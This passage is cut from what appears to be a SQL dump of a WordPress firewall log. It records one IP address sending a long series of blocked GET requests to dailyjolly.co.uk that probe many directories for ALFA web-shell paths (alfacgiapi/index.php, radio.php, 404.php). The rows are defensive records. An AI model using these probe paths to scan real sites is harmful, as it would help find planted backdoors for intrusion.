Safari\\/537.36\"}','y12r0eWmwvXQPB5R4T8tKlxZ',0,1674312315.8479,163,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/themes/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','ZlTCWiGj53eRsJ0vLXIfMY48',0,1674312316.1843,167,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/themes/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','4TA1srpBxiQXjN9dqDygetEP',0,1674312316.5306,164,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/upgrade/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','geQ9WyF0HvhqsnmjSxrLd36u',0,1674312319.8715,162,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/upgrade/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','f3S2h8KsOGtxgL4zDkNTnlZ7',0,1674312320.2412,190,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/upgrade/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','v7eT1RNWCFPYqXhw2dbOZfLA',0,1674312320.6269,158,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/upgrade/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','pTwDu16oNW5qHOZmJaG9Af2v',0,1674312324.0283,171,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/upgrade/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','E2n5o0yHxVtZv9CK3s78JzNi',0,1674312324.3999,173,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/upgrade/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','JWu3okB7mneaP6wXUqlvDEAb',0,1674312324.7450,168,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/updraft/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','NYzxlqTLvdSWO5uw81RmQ9yP',0,1674312328.1170,203,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/updraft/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','9eufMwD6QNVyXJYqxat7Kb1d',0,1674312328.4947,157,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/updraft/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','mHbMuB2sUJ4lG3vT1Nhnzq9c',0,1674312328.8322,160,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/updraft/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','1JXGexqazudM3b6hl7sfwCtI',0,1674312332.3665,186,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/updraft/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','9mkqPzo8nBRxveMyAfUict0I',0,1674312332.7347,182,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/updraft/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','chZx67pFJnD3lWYzLaf4wPSd',0,1674312333.0894,188,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/plugins/library/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','SVqdJfQruM34b85x2En0p1HA',0,1674312336.6289,198,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/plugins/library/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','wBHcXeTkn8PZb71ESRNqtFjV',0,1674312337.0091,164,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/plugins/library/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','z1Yc4GJOMeDo2TgqjhRdsutf',0,1674312337.3508,157,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/plugins/library/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','1AC7atcKYIVRJbofkGXlLymr',0,1674312340.6123,162,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/plugins/library/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','ISDtmuFWJoTvLxcKURfGCPaB',0,1674312340.9472,161,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/plugins/library/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','M2iPZcEbrUJ3sFOWN9o6jl7m',0,1674312341.2842,195,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-admin/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','DRAOEej2PSVQvN5waGi9uYWz',0,1674312344.6076,169,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-admin/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','uFY1pjM5HdXgbUy6O3BWrZ9L',0,1674312344.9419,169,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-admin/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','s06FDokRr5EydnVAvIlHtb21',0,1674312345.2866,159,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-admin/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Qgi4Kt2HXDoGcYFT6Oq5R3Bk',0,1674312348.5746,182,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-admin/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','YaF9pGtJ62jmxb1gCHNhX4IZ',0,1674312348.9362,159,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-admin/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','fQT2i48PjKsZOAYhSe0UH3kd',0,1674312349.2702,171,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-includes/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','RZ23fGnYCQeSIwsDVFavWXHu',0,1674312352.6998,204,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-includes/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','nZU6tdQsECoFkfbap5vOmVGc',0,1674312353.0789,205,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-includes/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','DfNsgPaRdp41bSVUhnLHQ5lI',0,1674312353.4562,173,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-includes/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','kKw8CxeEabqlpRmV3IUYdNci',0,1674312356.7346,175,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-includes/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','KzVRQtGovAqCTyD0PB7Zx5n2',0,1674312357.0857,175,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-includes/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','qfpsjN1UMBeSKWC6kmgZ3LzA',0,1674312357.4312,168,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','MmzjJtOvSYVyDbkfeEc43B28',0,1674312360.7538,200,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','oKkuvFQPdXsT4qMBjryIlCYa',0,1674312361.1573,167,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','mYdViobnprxqfBZtQWCMwKO1',0,1674312361.5001,194,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','97Ux2dtzQTwM0vqjimEJyXPb',0,1674312364.7823,195,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','oDg7Yc2nehR0TCJkS4PZpLX1',0,1674312365.1524,172,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Xb71Tz8fdglLRGnkAJPKvpM5',0,1674312365.5086,175,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/acme-challenge/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','xYwa8LAXqCe9HzfR2btVO1I0',0,1674312368.8033,167,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/acme-challenge/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','KovV1NdBXqLHFSEex9lrhcmC',0,1674312369.1363,155,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/acme-challenge/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Xyq8dRmGjah3F6Ap7CcS90eJ',0,1674312369.4672,165,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/acme-challenge/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','aC3dIVUc76trGNP2SOnxYmM1',0,1674312373.4290,173,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/acme-challenge/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Q0WoBUfGAZrpwNmCS2njdyb6',0,1674312373.7887,164,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/acme-challenge/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','cBTXV2xRGWN6OFbLf48Kmndq',0,1674312374.1265,173,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','z39PwFCbgicUyaJvomNRGdTQ',0,1674312377.6767,163,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','MR6fWxPLHQsGnZ85IizD2V93',0,1674312378.0139,235,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','wU4FGCnRsSENtL5iWT7bP2OB',0,1674312378.4328,166,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','MpZ1AvJoXIlUqyz6gdrN7Ss5',0,1674312381.7441,192,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','SD9PEvI08QNFRK7ZXtbyoldY',0,1674312382.1264,181,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','82uDXn9TkoaYWFUzKjhQmypN',0,1674312382.4793,164,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.tmb/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','OSMebVulkEh7ZjKswGypNXmC',0,1674312385.9725,169,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.tmb/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','QmP8apxtq0JHvgu9BkrC7NwW',0,1674312386.3389,160,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.tmb/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','saGeorLHkOZFu5hcMIXj2tP7',0,1674312386.6823,159,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.tmb/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','h20yBCknwivJdtNoaEcUQjfW',0,1674312390.1590,177,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.tmb/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Si2rhCpBQbVMy9ZJ0aFDmwx1',0,1674312390.5266,168,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.tmb/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','dQrw3eqojzuyxJUXRgiNbVPG',0,1674312390.8863,212,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.quarantine/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','9GYeLQTRaHNowWdF52hgUqcv',0,1674312395.2125,168,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.quarantine/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','x7f9yDrWU4NEXcaYAJt5LIBg',0,1674312395.5940,169,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.quarantine/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','qn93bUsMv4fCERpaIZ1OF2dX',0,1674312395.9582,165,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.quarantine/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 